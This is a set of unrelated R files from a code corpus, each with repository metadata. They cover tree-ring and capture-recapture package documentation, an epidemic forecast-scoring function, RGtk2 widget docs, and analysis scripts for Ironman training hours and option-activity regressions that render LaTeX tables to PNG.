get.objective(x)
get.variables(x)
get.constraints(x)
library(xRing)
### Name: print
### Title: Print xRing Objects
### Aliases: print print.xRing print print.xRingList
### ** Examples

# Example data shipped with xRing.
data(PaPiRaw)
data(PaPiSpan)
# Detect tree rings in the raw series; class(PaPi) reports the result type
# at run time (the aliases above suggest an xRingList -- confirm when run).
PaPi <- detectRings(PaPiRaw, PaPiSpan)
class(PaPi)
# Three equivalent ways of printing a single series.
print(PaPi$AFO1001a)
PaPi$AFO1001a
PaPi$AFO1001a[]
# Printing the whole collection dispatches to the list method.
print(PaPi)
PaPi
| /data/genthat_extracted_code/xRing/examples/print.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 299 | r | library(xRing)
### Name: print
### Title: Print xRing Objects
### Aliases: print print.xRing print print.xRingList
### ** Examples

# Example data shipped with xRing.
data(PaPiRaw)
data(PaPiSpan)
# Detect tree rings in the raw series; class(PaPi) reports the result type
# at run time (the aliases above suggest an xRingList -- confirm when run).
PaPi <- detectRings(PaPiRaw, PaPiSpan)
class(PaPi)
# Three equivalent ways of printing a single series.
print(PaPi$AFO1001a)
PaPi$AFO1001a
PaPi$AFO1001a[]
# Printing the whole collection dispatches to the list method.
print(PaPi)
PaPi
|
% Generated by roxygen2 (4.1.0): do not edit by hand
% Please edit documentation in R/crm.wrapper.R
\name{crm.wrapper}
\alias{create.model.list}
\alias{crm.wrapper}
\alias{crmlist_fromfiles}
\alias{load.model}
\alias{model.table}
\alias{rerun_crm}
\title{Automation of model runs}
\usage{
crm.wrapper(model.list,data,ddl=NULL,models=NULL,base="",
external=TRUE,run=TRUE,env=NULL,...)
create.model.list(parameters)
model.table(model.list)
load.model(x)
crmlist_fromfiles(filenames=NULL)
rerun_crm(data,ddl,model.list,method=NULL,modelnums=NULL,initial=NULL,...)
}
\arguments{
\item{model.list}{matrix of model names contained in the environment of models function; each row is a model and each column is for a parameter and the value is formula name}
\item{data}{Either the raw data which is a dataframe with at least one
column named ch (a character field containing the capture history) or a
processed dataframe. For rerun_crm this should be the processed dataframe}
\item{ddl}{Design data list which contains a list element for each parameter
type; if NULL it is created; For rerun_crm, must be the same ddl as used with the original run and cannot be NULL}
\item{models}{a function with a defined environment with model specifications as variables; values of model.list are some or all of those variables}
\item{base}{base value for model names}
\item{external}{if TRUE, model results are stored externally; otherwise they are stored in crmlist}
\item{run}{if TRUE, fit models; otherwise just create dml to test if model data are correct for formula}
\item{env}{environment to find model specifications if not parent.frame}
\item{...}{additional arguments passed to crm; for rerun_crm can be used to set hessian=TRUE for specific models after they have been run}
\item{parameters}{character vector of parameter names}
\item{x}{filename of externally stored model}
\item{method}{vector of methods to use for optimization if different that previous run in rerun_crm}
\item{modelnums}{model numbers to be re-run instead of those that did not converge}
\item{initial}{either a fitted crm model or the model number in model.list to use for starting values}
\item{filenames}{for non-Windows machines, vector of filenames for external files must be specified in crmlist_fromfiles including .rda extension}
}
\value{
create.model.list returns a matrix for crm.wrapper; crm.wrapper runs and stores models externally and returns a list of model results
and a model selection table; load.model returns model object that is stored externally
}
\description{
Some functions that help automate running a set of crm models based on parameter
specifications.
}
\details{
create.model.list creates all combinations of model specifications for the specified
set of parameters. In the calling environment it looks for objects named parameter.xxxxxx where xxxxxx can
be anything. It creates a matrix with a column for each parameter and as many rows
needed to create all combinations. This can be used as input to crm.wrapper.
crm.wrapper runs a sequence of crm models by constructing the call with the arguments
and the parameter specifications. The parameter specifications can either be in the
local environment or in the environment of the named function models. The advantage of the
latter is that it is self-contained such that sets of parameter specifications can
be selected without possibility of being over-written or accidentally changed whereas
with the former the set must be identified via a script and any in the environment will
be used which requires removing/recreating the set to be used.
}
\author{
Jeff Laake
}
\seealso{
\code{\link{crm}}
}
\keyword{models}
| /marked/man/crm.wrapper.Rd | no_license | bmcclintock/marked | R | false | false | 3,821 | rd | % Generated by roxygen2 (4.1.0): do not edit by hand
% Please edit documentation in R/crm.wrapper.R
\name{crm.wrapper}
\alias{create.model.list}
\alias{crm.wrapper}
\alias{crmlist_fromfiles}
\alias{load.model}
\alias{model.table}
\alias{rerun_crm}
\title{Automation of model runs}
\usage{
crm.wrapper(model.list,data,ddl=NULL,models=NULL,base="",
external=TRUE,run=TRUE,env=NULL,...)
create.model.list(parameters)
model.table(model.list)
load.model(x)
crmlist_fromfiles(filenames=NULL)
rerun_crm(data,ddl,model.list,method=NULL,modelnums=NULL,initial=NULL,...)
}
\arguments{
\item{model.list}{matrix of model names contained in the environment of models function; each row is a model and each column is for a parameter and the value is formula name}
\item{data}{Either the raw data which is a dataframe with at least one
column named ch (a character field containing the capture history) or a
processed dataframe. For rerun_crm this should be the processed dataframe}
\item{ddl}{Design data list which contains a list element for each parameter
type; if NULL it is created; For rerun_crm, must be the same ddl as used with the original run and cannot be NULL}
\item{models}{a function with a defined environment with model specifications as variables; values of model.list are some or all of those variables}
\item{base}{base value for model names}
\item{external}{if TRUE, model results are stored externally; otherwise they are stored in crmlist}
\item{run}{if TRUE, fit models; otherwise just create dml to test if model data are correct for formula}
\item{env}{environment to find model specifications if not parent.frame}
\item{...}{additional arguments passed to crm; for rerun_crm can be used to set hessian=TRUE for specific models after they have been run}
\item{parameters}{character vector of parameter names}
\item{x}{filename of externally stored model}
\item{method}{vector of methods to use for optimization if different that previous run in rerun_crm}
\item{modelnums}{model numbers to be re-run instead of those that did not converge}
\item{initial}{either a fitted crm model or the model number in model.list to use for starting values}
\item{filenames}{for non-Windows machines, vector of filenames for external files must be specified in crmlist_fromfiles including .rda extension}
}
\value{
create.model.list returns a matrix for crm.wrapper; crm.wrapper runs and stores models externally and returns a list of model results
and a model selection table; load.model returns model object that is stored externally
}
\description{
Some functions that help automate running a set of crm models based on parameter
specifications.
}
\details{
create.model.list creates all combinations of model specifications for the specified
set of parameters. In the calling environment it looks for objects named parameter.xxxxxx where xxxxxx can
be anything. It creates a matrix with a column for each parameter and as many rows
needed to create all combinations. This can be used as input to crm.wrapper.
crm.wrapper runs a sequence of crm models by constructing the call with the arguments
and the parameter specifications. The parameter specifications can either be in the
local environment or in the environment of the named function models. The advantage of the
latter is that it is self-contained such that sets of parameter specifications can
be selected without possibility of being over-written or accidentally changed whereas
with the former the set must be identified via a script and any in the environment will
be used which requires removing/recreating the set to be used.
}
\author{
Jeff Laake
}
\seealso{
\code{\link{crm}}
}
\keyword{models}
|
#' Score a case forecast
#'
#' Scores a dataframe of case forecasts against observed cases by delegating
#' to `score_forecast`, which expects the target column to be named `rt`.
#'
#' @param pred_cases Dataframe of predicted cases with the following variables:
#' `sample`, `date`, `cases` and forecast horizon. As produced by
#' `forecast_cases`.
#' @param obs_cases Dataframe of observed cases with the following variables:
#' `date` and `cases`.
#' @return A dataframe containing the following scores per forecast timepoint:
#' dss, crps, logs, bias, and sharpness as well as the forecast date and
#' time horizon.
#' @export
#'
#' @inheritParams score_forecast
#' @importFrom dplyr rename
#' @examples
#' ## Fit a model (using a subset of observations)
#' samples <- forecast_rt(EpiSoon::example_obs_rts[1:10, ],
#'                        model = function(...) {EpiSoon::bsts_model(model =
#'                          function(ss, y){bsts::AddSemilocalLinearTrend(ss, y = y)}, ...)},
#'                        horizon = 7, samples = 10)
#'
#' pred_cases <- forecast_cases(EpiSoon::example_obs_cases,
#'                              samples, EpiSoon::example_serial_interval)
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases)
#'
#' ## Score the model fit, keeping only selected scores
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases, scores = c("crps", "sharpness", "bias"))
score_case_forecast <- function(pred_cases, obs_cases, scores = "all") {
  # score_forecast() keys on a column called `rt`, so relabel the case counts
  # in both inputs before delegating.
  pred_renamed <- dplyr::rename(pred_cases, rt = cases)
  obs_renamed <- dplyr::rename(obs_cases, rt = cases)
  EpiSoon::score_forecast(pred_renamed, obs_renamed, scores = scores)
}
| /R/score_case_forecast.R | permissive | medewitt/EpiSoon | R | false | false | 1,674 | r |
#' Score a case forecast
#'
#' @param pred_cases Dataframe of predicted cases with the following variables: `sample`, `date`,
#' `cases` and forecast horizon. As produced by `forecast_cases`.
#' @param obs_cases Dataframe of observed cases with the following variables: `date` and `cases`.
#' @return A dataframe containing the following scores per forecast timepoint: dss, crps,
#' logs, bias, and sharpness as well as the forecast date and time horizon.
#' @export
#'
#' @inheritParams score_forecast
#' @importFrom dplyr rename
#' @examples
#' ## Fit a model (using a subset of observations)
#' samples <- forecast_rt(EpiSoon::example_obs_rts[1:10, ],
#'                        model = function(...) {EpiSoon::bsts_model(model =
#'                          function(ss, y){bsts::AddSemilocalLinearTrend(ss, y = y)}, ...)},
#'                        horizon = 7, samples = 10)
#'
#' pred_cases <- forecast_cases(EpiSoon::example_obs_cases,
#'                              samples, EpiSoon::example_serial_interval)
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases)
#'
#'
#' ## Score the model fit (with observations during the time horizon of the forecast)
#' score_case_forecast(pred_cases, EpiSoon::example_obs_cases, scores = c("crps", "sharpness", "bias"))
score_case_forecast <- function(pred_cases, obs_cases, scores = "all") {
  # score_forecast() expects the target column to be named `rt`, so relabel
  # the case counts in both the predictions and the observations first.
  pred_cases <- dplyr::rename(pred_cases, rt = cases)
  obs_cases <- dplyr::rename(obs_cases, rt = cases)
  scores <- EpiSoon::score_forecast(pred_cases, obs_cases,
                                    scores = scores)
  return(scores)
}
|
# Weekly Ironman (IM) training-volume analysis: reads a per-week CSV of
# swim/bike/run durations and writes summary plots under ./figures/latest/.
library(data.table)
library(lubridate)
library(data.table)  # NOTE(review): duplicate of the library() call above
library(ggplot2)
train.data <- data.table(read.csv("./training_data.csv"))
# Parse the "H:M:S" duration strings into POSIXct so hour()/minute() work.
train.data[,
           `:=`(Swim=as.POSIXct(Swim,format="%T"),
                Bike=as.POSIXct(Bike,format="%T"),
                Run=as.POSIXct(Run,format="%T"),
                Total=as.POSIXct(Total,format="%T"))]
# Convert each duration to decimal hours (seconds are dropped).
train.data[,
           `:=`(swim_time=hour(Swim)+minute(Swim)/60,
                bike_time=hour(Bike)+minute(Bike)/60,
                run_time=hour(Run)+minute(Run)/60,
                total_time=hour(Total)+minute(Total)/60)]
### Remove TP
# Drop rows without a Week and rows from the excluded training programs.
train.data <- train.data[!is.na(Week)]
levels(train.data$Program)[levels(train.data$Program) %in% c("TrainingPeaks","","TTB-600ATP")] <- NA
train.data <- train.data[!is.na(Program)]
# Weeks remaining until race day within each program (0 = final week).
train.data[,race_week:=max(Week)-Week,Program]
# Weekly total swim+bike+run hours by program.
p <- ggplot(train.data,aes(x=-race_week,y=total_time,color=Program)) + geom_line() +
  geom_point() +
  theme_bw() +
  ggtitle("Weekly IM Training") +
  ylab("Weekly Total Training (SBR) Hours") +
  xlab("Weeks Until IM") +
  scale_x_continuous(breaks=seq(-40,0,by=5),
                     labels=seq(40,0,by=-5)) +
  scale_y_continuous(breaks=seq(0,21,by=3),
                     labels=seq(0,21,by=3),
                     limits=c(3,21))
ggsave("./figures/latest/gr_tot_sbr_time_to_im.png",plot=p)
print(p)
# Running (cumulative) hours to date within each program.
train.data[,`:=`(c_total_time=cumsum(total_time),
                 c_swim_time=cumsum(swim_time),
                 c_bike_time=cumsum(bike_time),
                 c_run_time=cumsum(run_time)),Program]
p <- ggplot(train.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
  geom_point() +
  theme_bw() +
  ggtitle("Cumulative IM Training") +
  ylab("Cumulative Training (SBR) Hours") +
  xlab("Weeks Until IM") +
  scale_x_continuous(breaks=seq(-40,0,by=5),
                     labels=seq(40,0,by=-5)) +
  scale_y_continuous(breaks=seq(0,475,by=25),
                     labels=seq(0,475,by=25)) +
  theme(legend.position = "top")
ggsave("./figures/latest/gr_c_tot_sbr_time_to_im.png",plot=p)
print(p)
## add prep phase for rest of year
# Pad every program out to 52 weeks; weeks without recorded training are
# filled with a flat 7 hours/week before re-accumulating.
atp.data <- train.data[,list(race_week = 0:51),Program]
atp.data <- merge(atp.data,train.data[,list(total_time),by=c("Program","race_week")],by=c("Program","race_week"),all=TRUE)
atp.data[is.na(total_time),total_time:=7]
atp.data <- atp.data[order(-race_week)]
atp.data[,`:=`(c_total_time=cumsum(total_time)),Program]
p <- ggplot(atp.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
  geom_point() +
  theme_bw() +
  ggtitle("Cumulative IM Training") +
  ylab("Cumulative Training (SBR) Hours") +
  xlab("Weeks Until IM") +
  scale_x_continuous(breaks=seq(-51,0,by=5),
                     labels=seq(51,0,by=-5)) +
  scale_y_continuous(breaks=seq(0,600,by=25),
                     labels=seq(0,600,by=25)) +
  theme(legend.position = "top")
ggsave("./figures/latest/gr_atp_c_tot_sbr_time_to_im.png",plot=p)
print(p)
# Per-sport share of cumulative training time, plus average-share labels
# positioned inside each stacked bar.
train.data[,`:=`(run_frac=c_run_time/c_total_time,
                 bike_frac=c_bike_time/c_total_time,
                 swim_frac=c_swim_time/c_total_time),
           Program]
frac.data <- melt(train.data[,list(race_week,run_frac,bike_frac,swim_frac),Program],id.vars = c('race_week','Program'))
avg.data <- frac.data[,list(avg_frac = mean(value),race_week=mean(race_week+1)),by=c("Program","variable")]
avg.data$variable <- ordered(avg.data$variable)
avg.data <- avg.data[order(variable)]
avg.data[,pos_frac := cumsum(avg_frac)-(avg_frac/3),Program]
p <- ggplot(frac.data,aes(x=-race_week,y=value,fill=variable)) +
  geom_bar(stat='identity',position='stack') +
  theme_bw() +
  facet_wrap(~Program) +
  geom_text(data=avg.data,aes(y=pos_frac,label=paste0(round(100*avg_frac,digits=1),"%")),size=10) +
  theme(legend.position = "top") +
  ylab("") +
  xlab("Weeks Until IM")
ggsave("./figures/latest/gr_fractional_sbr_vs_program.png",plot=p)
print(p)
# (removed leftover interactive debugging calls: browser();browser() -- they
# halted the script when run non-interactively via Rscript/source)
# Per-sport weekly and cumulative hours; these plots are printed only
# (no ggsave() calls in this section).
## Swimming
p <- ggplot(train.data,aes(x=-race_week,y=swim_time,color=Program)) + geom_line() +
  geom_point() +
  theme_bw() +
  ggtitle("Swim Hours") +
  ylab("Weekly Swim Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_swim_time,color=Program)) + geom_line() +
  geom_point() +
  theme_bw() +
  ggtitle("Cumulative Swim Hours") +
  ylab("Cumulative Swim Hours")
print(p)
## Bike
p <- ggplot(train.data,aes(x=-race_week,y=bike_time,color=Program)) + geom_line() +
  geom_point() +
  ggtitle("Bike Hours") +
  theme_bw() +
  ylab("Weekly Bike Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_bike_time,color=Program)) + geom_line() +
  geom_point() +
  ggtitle("Cumulative Bike Hours") +
  theme_bw() +
  ylab("Cumulative Bike Hours")
print(p)
## Run
p <- ggplot(train.data,aes(x=-race_week,y=run_time,color=Program)) + geom_line() +
  geom_point() +
  ggtitle("Run Hours") +
  theme_bw() +
  ylab("Weekly Run Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_run_time,color=Program)) + geom_line() +
  geom_point() +
  ggtitle("Cumulative Run Hours") +
  theme_bw() +
  ylab("Cumulative Run Hours")
print(p)
| /global.R | no_license | ericlwilliams/im_training | R | false | false | 5,922 | r | library(data.table)
library(lubridate)
library(data.table)
library(ggplot2)
train.data <- data.table(read.csv("./training_data.csv"))
train.data[,
`:=`(Swim=as.POSIXct(Swim,format="%T"),
Bike=as.POSIXct(Bike,format="%T"),
Run=as.POSIXct(Run,format="%T"),
Total=as.POSIXct(Total,format="%T"))]
train.data[,
`:=`(swim_time=hour(Swim)+minute(Swim)/60,
bike_time=hour(Bike)+minute(Bike)/60,
run_time=hour(Run)+minute(Run)/60,
total_time=hour(Total)+minute(Total)/60)]
### Remove TP
train.data <- train.data[!is.na(Week)]
levels(train.data$Program)[levels(train.data$Program) %in% c("TrainingPeaks","","TTB-600ATP")] <- NA
train.data <- train.data[!is.na(Program)]
train.data[,race_week:=max(Week)-Week,Program]
p <- ggplot(train.data,aes(x=-race_week,y=total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Weekly IM Training") +
ylab("Weekly Total Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-40,0,by=5),
labels=seq(40,0,by=-5)) +
scale_y_continuous(breaks=seq(0,21,by=3),
labels=seq(0,21,by=3),
limits=c(3,21))
ggsave("./figures/latest/gr_tot_sbr_time_to_im.png",plot=p)
print(p)
train.data[,`:=`(c_total_time=cumsum(total_time),
c_swim_time=cumsum(swim_time),
c_bike_time=cumsum(bike_time),
c_run_time=cumsum(run_time)),Program]
p <- ggplot(train.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative IM Training") +
ylab("Cumulative Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-40,0,by=5),
labels=seq(40,0,by=-5)) +
scale_y_continuous(breaks=seq(0,475,by=25),
labels=seq(0,475,by=25)) +
theme(legend.position = "top")
ggsave("./figures/latest/gr_c_tot_sbr_time_to_im.png",plot=p)
print(p)
## add prep phase for rest of year
atp.data <- train.data[,list(race_week = 0:51),Program]
atp.data <- merge(atp.data,train.data[,list(total_time),by=c("Program","race_week")],by=c("Program","race_week"),all=TRUE)
atp.data[is.na(total_time),total_time:=7]
atp.data <- atp.data[order(-race_week)]
atp.data[,`:=`(c_total_time=cumsum(total_time)),Program]
p <- ggplot(atp.data,aes(x=-race_week,y=c_total_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative IM Training") +
ylab("Cumulative Training (SBR) Hours") +
xlab("Weeks Until IM") +
scale_x_continuous(breaks=seq(-51,0,by=5),
labels=seq(51,0,by=-5)) +
scale_y_continuous(breaks=seq(0,600,by=25),
labels=seq(0,600,by=25)) +
theme(legend.position = "top")
ggsave("./figures/latest/gr_atp_c_tot_sbr_time_to_im.png",plot=p)
print(p)
train.data[,`:=`(run_frac=c_run_time/c_total_time,
bike_frac=c_bike_time/c_total_time,
swim_frac=c_swim_time/c_total_time),
Program]
frac.data <- melt(train.data[,list(race_week,run_frac,bike_frac,swim_frac),Program],id.vars = c('race_week','Program'))
avg.data <- frac.data[,list(avg_frac = mean(value),race_week=mean(race_week+1)),by=c("Program","variable")]
avg.data$variable <- ordered(avg.data$variable)
avg.data <- avg.data[order(variable)]
avg.data[,pos_frac := cumsum(avg_frac)-(avg_frac/3),Program]
p <- ggplot(frac.data,aes(x=-race_week,y=value,fill=variable)) +
geom_bar(stat='identity',position='stack') +
theme_bw() +
facet_wrap(~Program) +
geom_text(data=avg.data,aes(y=pos_frac,label=paste0(round(100*avg_frac,digits=1),"%")),size=10) +
theme(legend.position = "top") +
ylab("") +
xlab("Weeks Until IM")
ggsave("./figures/latest/gr_fractional_sbr_vs_program.png",plot=p)
print(p)
# (removed leftover interactive debugging calls: browser();browser() -- they
# halted the script when run non-interactively via Rscript/source)
## Swimming
p <- ggplot(train.data,aes(x=-race_week,y=swim_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Swim Hours") +
ylab("Weekly Swim Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_swim_time,color=Program)) + geom_line() +
geom_point() +
theme_bw() +
ggtitle("Cumulative Swim Hours") +
ylab("Cumulative Swim Hours")
print(p)
## Bike
p <- ggplot(train.data,aes(x=-race_week,y=bike_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Bike Hours") +
theme_bw() +
ylab("Weekly Bike Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_bike_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Cumulative Bike Hours") +
theme_bw() +
ylab("Cumulative Bike Hours")
print(p)
## Run
p <- ggplot(train.data,aes(x=-race_week,y=run_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Run Hours") +
theme_bw() +
ylab("Weekly Run Hours")
print(p)
p <- ggplot(train.data,aes(x=-race_week,y=c_run_time,color=Program)) + geom_line() +
geom_point() +
ggtitle("Cumulative Run Hours") +
theme_bw() +
ylab("Cumulative Run Hours")
print(p)
|
\alias{GtkCellRendererSpin}
\alias{gtkCellRendererSpin}
\name{GtkCellRendererSpin}
\title{GtkCellRendererSpin}
\description{Renders a spin button in a cell}
\section{Methods and Functions}{
\code{\link{gtkCellRendererSpinNew}()}\cr
\code{gtkCellRendererSpin()}
}
\section{Hierarchy}{\preformatted{GObject
+----GInitiallyUnowned
+----GtkObject
+----GtkCellRenderer
+----GtkCellRendererText
+----GtkCellRendererSpin}}
\section{Detailed Description}{\code{\link{GtkCellRendererSpin}} renders text in a cell like \code{\link{GtkCellRendererText}} from
which it is derived. But while \code{\link{GtkCellRendererText}} offers a simple entry to
edit the text, \code{\link{GtkCellRendererSpin}} offers a \code{\link{GtkSpinButton}} widget. Of course,
that means that the text has to be parseable as a floating point number.
The range of the spinbutton is taken from the adjustment property of the
cell renderer, which can be set explicitly or mapped to a column in the
tree model, like all properties of cell renderers. \code{\link{GtkCellRendererSpin}}
also has properties for the climb rate and the number of digits to
display. Other \code{\link{GtkSpinButton}} properties can be set in a handler for the
start-editing signal.
The \code{\link{GtkCellRendererSpin}} cell renderer was added in GTK+ 2.10.}
\section{Structures}{\describe{\item{\verb{GtkCellRendererSpin}}{
\emph{undocumented
}
}}}
\section{Convenient Construction}{\code{gtkCellRendererSpin} is the equivalent of \code{\link{gtkCellRendererSpinNew}}.}
\section{Properties}{\describe{
\item{\verb{adjustment} [\code{\link{GtkAdjustment}} : * : Read / Write]}{
The adjustment that holds the value of the spinbutton.
This must be non-\code{NULL} for the cell renderer to be editable.
Since 2.10
}
\item{\verb{climb-rate} [numeric : Read / Write]}{
The acceleration rate when you hold down a button.
Allowed values: >= 0 Default value: 0 Since 2.10
}
\item{\verb{digits} [numeric : Read / Write]}{
The number of decimal places to display.
Allowed values: <= 20 Default value: 0 Since 2.10
}
}}
\references{\url{https://developer-old.gnome.org/gtk2/stable/GtkCellRendererSpin.html}}
\author{Derived by RGtkGen from GTK+ documentation}
\seealso{
\code{\link{GtkCellRendererText}}
\code{\link{GtkSpinButton}}
}
\keyword{internal}
| /RGtk2/man/GtkCellRendererSpin.Rd | no_license | lawremi/RGtk2 | R | false | false | 2,384 | rd | \alias{GtkCellRendererSpin}
\alias{gtkCellRendererSpin}
\name{GtkCellRendererSpin}
\title{GtkCellRendererSpin}
\description{Renders a spin button in a cell}
\section{Methods and Functions}{
\code{\link{gtkCellRendererSpinNew}()}\cr
\code{gtkCellRendererSpin()}
}
\section{Hierarchy}{\preformatted{GObject
+----GInitiallyUnowned
+----GtkObject
+----GtkCellRenderer
+----GtkCellRendererText
+----GtkCellRendererSpin}}
\section{Detailed Description}{\code{\link{GtkCellRendererSpin}} renders text in a cell like \code{\link{GtkCellRendererText}} from
which it is derived. But while \code{\link{GtkCellRendererText}} offers a simple entry to
edit the text, \code{\link{GtkCellRendererSpin}} offers a \code{\link{GtkSpinButton}} widget. Of course,
that means that the text has to be parseable as a floating point number.
The range of the spinbutton is taken from the adjustment property of the
cell renderer, which can be set explicitly or mapped to a column in the
tree model, like all properties of cell renderers. \code{\link{GtkCellRendererSpin}}
also has properties for the climb rate and the number of digits to
display. Other \code{\link{GtkSpinButton}} properties can be set in a handler for the
start-editing signal.
The \code{\link{GtkCellRendererSpin}} cell renderer was added in GTK+ 2.10.}
\section{Structures}{\describe{\item{\verb{GtkCellRendererSpin}}{
\emph{undocumented
}
}}}
\section{Convenient Construction}{\code{gtkCellRendererSpin} is the equivalent of \code{\link{gtkCellRendererSpinNew}}.}
\section{Properties}{\describe{
\item{\verb{adjustment} [\code{\link{GtkAdjustment}} : * : Read / Write]}{
The adjustment that holds the value of the spinbutton.
This must be non-\code{NULL} for the cell renderer to be editable.
Since 2.10
}
\item{\verb{climb-rate} [numeric : Read / Write]}{
The acceleration rate when you hold down a button.
Allowed values: >= 0 Default value: 0 Since 2.10
}
\item{\verb{digits} [numeric : Read / Write]}{
The number of decimal places to display.
Allowed values: <= 20 Default value: 0 Since 2.10
}
}}
\references{\url{https://developer-old.gnome.org/gtk2/stable/GtkCellRendererSpin.html}}
\author{Derived by RGtkGen from GTK+ documentation}
\seealso{
\code{\link{GtkCellRendererText}}
\code{\link{GtkSpinButton}}
}
\keyword{internal}
|
# Model-comparison tables are produced with texreg; library() errors loudly
# if the package is missing (require() would only warn).
library(texreg)
regData <- read.csv("~/Downloads/regdata.csv")
# One-step shifted ("Lag1") regressors.  Every shifted column uses the same
# c(x[-1], NA) pattern, i.e. row i holds the value from row i+1; whether that
# is a lag or a lead depends on the row ordering of regdata.csv -- confirm
# against the data file.
# FIX: NCallOILag1 previously copied NCallOI unshifted (c(NCallOI)), which
# duplicated the contemporaneous column used alongside it in the lm() models;
# it now follows the same shift pattern as every other *Lag1 column.
regData <- transform(regData, NCallOILag1 = c(NCallOI[-1], NA))
#regData = transform(regData, NCallOIChangedLag1 = c(NCallOIChanged[-1], NA))
regData <- transform(regData, NPutOILag1 = c(NPutOI[-1], NA))
#regData = transform(regData, NPutOIChangeLag1 = c(NPutOIChange[-1], NA))
regData <- transform(regData, NVolLag1 = c(NVol[-1], NA))
#regData = transform(regData, NVolChangeLag1 = c(NVolChange[-1], NA))
regData <- transform(regData, PutCallOIRatioLag1 = c(PutCallOIRatio[-1], NA))
regData <- transform(regData, NMeanIVLag1 = c(NMeanIV[-1], NA))
regData <- transform(regData, MeanIVLag1 = c(MeanIV[-1], NA))
regData <- transform(regData, CallIVLag1 = c(CallIV[-1], NA))
regData <- transform(regData, PutIVLag1 = c(PutIV[-1], NA))
regData <- transform(regData, Excess.ReturnLag1 = c(Excess.Return[-1], NA))
# Event-window subsets keyed on DateDiff (days relative to the event,
# negative = before the event).
regDataBase <- regData[regData$DateDiff >= -141 & regData$DateDiff <= -41, ]
regData30 <- regData[regData$DateDiff >= -30 & regData$DateDiff <= -1, ]
regData20 <- regData[regData$DateDiff >= -20 & regData$DateDiff <= -1, ]
regData10 <- regData[regData$DateDiff >= -10 & regData$DateDiff <= -1, ]
# Full specification: regress excess returns on both the shifted ("Lag1")
# and contemporaneous option-activity regressors.
baseModel <- function(dataToUse) {
  full_spec <- Excess.Return ~ NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 +
    NPutOILag1 + NVol + PutCallOIRatio + NCallOI + NPutOI
  lm(full_spec, data = dataToUse)
}
# Restricted specification: shifted ("Lag1") regressors only.
baseModelLagOnly <- function(dataToUse) {
  lm(Excess.Return ~ 
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1
     , data=dataToUse)
}
# Full specification augmented with mean implied volatility, both shifted
# (NMeanIVLag1) and contemporaneous (NMeanIV).
baseModelIV <- function(dataToUse) {
  lm(Excess.Return ~ 
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
     + NVol + PutCallOIRatio + NCallOI + NPutOI + NMeanIV
     , data=dataToUse)
}
# Restricted IV specification: shifted regressors plus shifted mean implied
# volatility only.
baseModelIVLagOnly <- function(dataToUse) {
  lm(Excess.Return ~ 
       NVolLag1 + PutCallOIRatioLag1 + NCallOILag1 + NPutOILag1 + NMeanIVLag1
     , data=dataToUse)
}
# Wrap a texreg-produced LaTeX table fragment (latexS) in a minimal
# standalone document, then shell out to `latex` and `dvipng` to render it:
# fileName.tex -> fileName.dvi -> PNG.  Requires a LaTeX toolchain on the
# PATH; called purely for its side effects (files written to the working
# directory).
latexToPng <- function(latexS, fileName) {
  latexFileName = paste(fileName, ".tex", sep='')
  dviFileName = paste(fileName, ".dvi", sep='')
  fileConn<-file(latexFileName)
  #\\usepackage[paperwidth=5.5in,paperheight=7in,noheadfoot,margin=0in]{geometry}
  # Preamble/closing of the wrapper document; booktabs and dcolumn are loaded
  # to match the options texreg may emit.
  beginLines = '\\documentclass{report}
  \\usepackage{booktabs}
  \\usepackage{dcolumn}
  \\begin{document}\\pagestyle{empty}
  \\begin{table}
  \\begin{center}
  '
  endLines = '
  \\end{center}
  \\label{table:coefficients}
  \\end{table}
  \\end{document}
  '
  writeLines(c(beginLines, latexS, endLines), fileConn)
  close(fileConn)
  # dvipng: -T tight crops to the content, -D 600 sets the resolution (dpi).
  invisible(system(paste("latex ", latexFileName)))
  invisible(system(paste("dvipng -T tight", "-D", 600, dviFileName)))
}
# Fit each specification on the four event windows defined above.
modelBase = baseModel(regDataBase)
modelBaseLag = baseModelLagOnly(regDataBase)
model30 = baseModel(regData30)
model30Lag = baseModelLagOnly(regData30)
model20 = baseModel(regData20)
model20Lag = baseModelLagOnly(regData20)
model10 = baseModel(regData10)
model10Lag = baseModelLagOnly(regData10)
modelBaseIV = baseModelIV(regDataBase)
modelBaseIVLag = baseModelIVLagOnly(regDataBase)
model30IV = baseModelIV(regData30)
model30IVLag = baseModelIVLagOnly(regData30)
model20IV = baseModelIV(regData20)
model20IVLag = baseModelIVLagOnly(regData20)
model10IV = baseModelIV(regData10)
model10IVLag = baseModelIVLagOnly(regData10)
# Side-by-side comparison tables (one column per window/specification pair),
# rendered to PNG via latexToPng().
latexBaseModel = texreg(list(modelBase, modelBaseLag, model30,model30Lag,
                             model20,model20Lag,model10,model10Lag),
                        model.names=c("[-141,-41]","[-141,-41]", "[-30,-1]","[-30,-1]",
                                      "[-20,-1]","[-20,-1]","[-10,-1]","[-10,-1]"),
                        digits = 5, table=FALSE, booktabs=FALSE, dcolumn=FALSE)
latexToPng(latexBaseModel, "baseModel")
